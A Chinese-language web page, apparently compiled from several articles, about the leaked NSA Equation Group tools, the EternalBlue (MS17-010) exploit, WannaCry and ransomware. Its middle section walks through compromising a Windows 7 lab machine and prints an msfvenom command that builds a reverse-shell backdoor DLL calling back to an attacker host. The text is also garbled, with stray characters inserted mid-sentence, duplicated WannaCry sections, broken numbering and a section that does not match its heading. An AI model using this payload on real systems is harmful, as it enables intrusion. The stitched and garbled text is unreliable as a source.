nsa方程式組工具

Ⅰ 勒索病毒是誰弄的

勒索病毒據說是從NSA（美國國家安全局）裡面泄露出來的，去年黑客從NSA獲取了多個黑客工具，獲取了windows系統多個漏洞，這其中就包括永恆之藍，勒索病毒就是利用這個漏洞進行攻擊的。
目前這個黑客組織比較神秘，頭目光明「影子經紀人」。

Ⅱ ms17-010：利用「永恆之藍」攻陷一台計算機

我估摸著這兩天大家都應該被一款老舊的勒索病毒刷爆了朋友圈，可能還有些同學不幸中招，那麼是什麼原因導致了這款勒索病毒如此猖狂？

這件事情還得從一個黑客組織說起，這個組織叫做Equation Group（方程式組織），這一黑客團伙與美國國家安全局（NSA）的關系一直十分密切。而且外界也普遍認為，Equation Group是美國國家安全局的一個下屬部門。很多安全研究專家表示，Equation Group這一黑客組織所擁有的技術無論是從復雜程度還是從其先進程度來看，都已經超越了目前絕大多數的黑客團體，而且該黑客組織已經活躍了二十多年了。

然而，這個黑客組織被另一黑客團伙「The Shadow Brokers」（影子經紀人）給入侵了……(就是這么任性)。「The Shadow Brokers」（影子經紀人）自稱他們從Equation Group手裡拿到了很大一部分黑客工具，決定公開叫賣。

本以為能狠賺一筆，但實際上卻沒有人鳥他們，就橡陸圓是這么神奇。於梁塌是The Shadow Brokers決定公開一部分有價值的工具，其中「eternalblue」（永恆之藍）就是其中之一（漏洞編號ms17-010）。那麼永恆之藍這個漏洞利用程序究竟牛X到什麼地步呢？這么說吧，除了windows 10以外，windows系列的系統無一能夠倖免。

於是乎，永恆之藍漏洞利用悉孫程序+wannacry勒索軟體程序造就了迄今為止最巨大的勒索交費活動，影響到近百個國家上千家企業及公共組織。

接下來，滿足小白的好奇心，一起探究The Shadow Brokers公布的永恆之藍漏洞利用程序，如何利用ms17-010攻陷一台64位windows 7。

攻擊機1(192.168.1.101)：
裝有metasploit的linux
攻擊機2(192.168.1.137)：
可以運行The Shadow Brokers工具箱的windows xp->python2.6+ PyWin32 v2.12
靶機(192.168.1.140)：
windows 7 x64（開放139、445埠）

利用The Shadow Brokers工具箱中的永恆之藍利用程序攻陷靶機

修改後的路徑與目錄當前的路徑一致

一路回車，直到輸入項目名稱處，輸入項目名稱

繼續回車

繼續一路回車，直到選擇模式選擇1

繼續一路回車，直至攻擊完成

相關命令：
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll

一路回車，直到選擇系統架構，由於我們要攻擊的主機是win 7 x64位，故這里選擇1

選擇2 dll注入

Ps：喜歡的留個贊b(￣▽￣)d ~也可以關注專題：黑客師。

Ⅲ 淺談Wannacry蠕蟲比特幣勒索病毒軟體

Wannacry蠕蟲比特幣勒索病毒軟體是一場全球性的網路危機，造成了巨大損失。以下是關於Wannacry蠕蟲比特幣勒索病毒軟體的詳細解答：

一、病毒特性

• 利用NSA黑客工具：Wannacry蠕蟲比特幣勒索病毒利用了NSA的黑客工具——ETERNALBLUE漏洞，通過SMB伺服器漏洞進行迅速傳播。
• 比特幣勒索：該病毒要求受害者支付比特幣以解鎖被鎖定的文件，這是一種新型的勒索方式，增加了病毒的惡意性和危害性。

二、爆發影響

• 全球范圍：Wannacry蠕蟲比特幣勒索病毒的爆發波及了數百個國家，數千家企業和公共組織遭受了嚴重損失。
• 網路災難：這場病毒攻擊無疑給網路世界帶來了一場災難，許多重要數據和文件被鎖定，導致業務中斷和財產損失。

三、應對措施

• 立即斷網：在發現病毒攻擊後，應立即斷網以防止病毒進一步擴散。
• 檢測隔離：檢測並隔離受感染的計算機，防止病毒繼續感染其他設備。
• 阻止擴散：阻止病毒通過移動設備等渠道進一步擴散，確保網路安全。
• 檢測和恢復工具：利用針對「永恆之藍」的檢測和恢復工具來對抗勒索病毒，恢復受感染的系統和數據。

四、事件背景

• 方程式組織資料被盜：方程式組織的內部資料被盜事件為Wannacry蠕蟲比特幣勒索病毒的爆發提供了契機。
• 影子經紀人行動：影子經紀人的行動暴露了方程式組織與美國國家安全局的潛在聯系，進一步揭示了高級網路攻擊工具的濫用問題。

五、未來展望與專家建議

• 勒索軟體復雜性：Wannacry蠕蟲比特幣勒索病毒的設置表明了勒索軟體的復雜性和潛在的惡意，未來可能會出現更多類似的攻擊方式。
• 不輕易支付勒索：專家建議受害者不要輕易支付勒索，因為這可能會刺激更多的攻擊行為，同時也不利於打擊網路犯罪和維護網路安全。

Ⅳ 美國攻擊西工大的網路武器「飲茶」是什麼它是如何竊密的

美國攻擊西工大的網路武器“飲茶”是嗅探竊密類網路武器，它是這樣竊密的。

一、網路武器“飲茶”

比如“棱鏡”項目，美國情報機構擁有高級管理人員的許可權，可以在任何時候，都可以在微軟，雅虎，谷歌，蘋果等公司的伺服器上，進行長期的數據挖掘。

除此以外，美國的“方程式”組織所使用的黑客工具中，也多次出現了微軟、思科甚至中國部分互聯網服務商旗下產品的“零日漏洞”（0Day）或者後門，美國的網路攻擊無處不在。

Ⅳ 淺談Wannacry蠕蟲比特幣勒索病毒軟體

全球范圍內遭遇了一場前所未有的網路危機，Wannacry蠕蟲比特幣勒索病毒的爆發造成了數百個國家數千家企業和公共組織的嚴重損失。這款病毒利用NSA黑客工具——ETERNALBLUE漏洞，通過SMB伺服器漏洞迅速傳播，就像一個古老而強大的時空穿越機器，潛伏多年後突然被激活。

5月12日，WannaCry蠕蟲的全球性攻擊震驚了網路安全界。它要求受害者支付比特幣以解鎖被鎖定的文件，這無疑是網路世界的一場災難。解決措施包括立即斷網，檢測並隔離受感染的計算機，阻止病毒通過移動設備擴散。同時，針對"永恆之藍"的檢測和恢復工具也成為了對抗勒索的手段。

這個事件的背景，可以追溯到方程式組織的內部資料被盜事件，影子經紀人的行動暴露了他們與美國國家安全局的潛在聯系。這些高級網路攻擊工具被用於WannaCry，使其傳播效率大增，引發了全球范圍內的大規模勒索活動。網路安全漏洞的濫用，不僅被黑客和犯罪分子所利用，也成為了安全機構爭奪網路空間控制權的工具。

盡管黑客設置的秘密開關域名是為了躲避沙箱檢測，但這也表明了勒索軟體的復雜性和潛在的惡意。對於勒索軟體的未來，我們不能排除其他可能的利用方式，尤其是當國家機構掌握如此強大的網路工具時。對於受害者，專家建議不要輕易支付勒索，因為這可能會刺激更多的攻擊行為。

Ⅵ 勒索病毒的攻擊過程是怎樣的

勒索病毒工作原理：

勒索病毒是黑客通過鎖屏、加密等方式劫持用戶設備或文件，並以此敲詐用戶錢財的惡意軟體。黑客利用系統漏洞或通過網路釣魚等方式，向受害電腦或伺服器植入病毒，加密硬碟上的文檔乃至整個硬碟，然後向受害者索要數額不等的贖金後才予以解密，如果用戶未在指定時間繳納黑客要求的金額，被鎖文件將無法恢復。

1、針對個人用戶常見的攻擊方式
通過用戶瀏覽網頁下載勒索病毒，攻擊者將病毒偽裝為盜版軟體、外掛軟體、色情播放器等，誘導受害者下載運行病毒，運行後加密受害者機器。此外勒索病毒也會通過釣魚郵件和系統漏洞進行傳播。針對個人用戶的攻擊流程如下圖所示：

釣魚郵件攻擊邏輯

文章轉載至：2018勒索病毒全面分析報告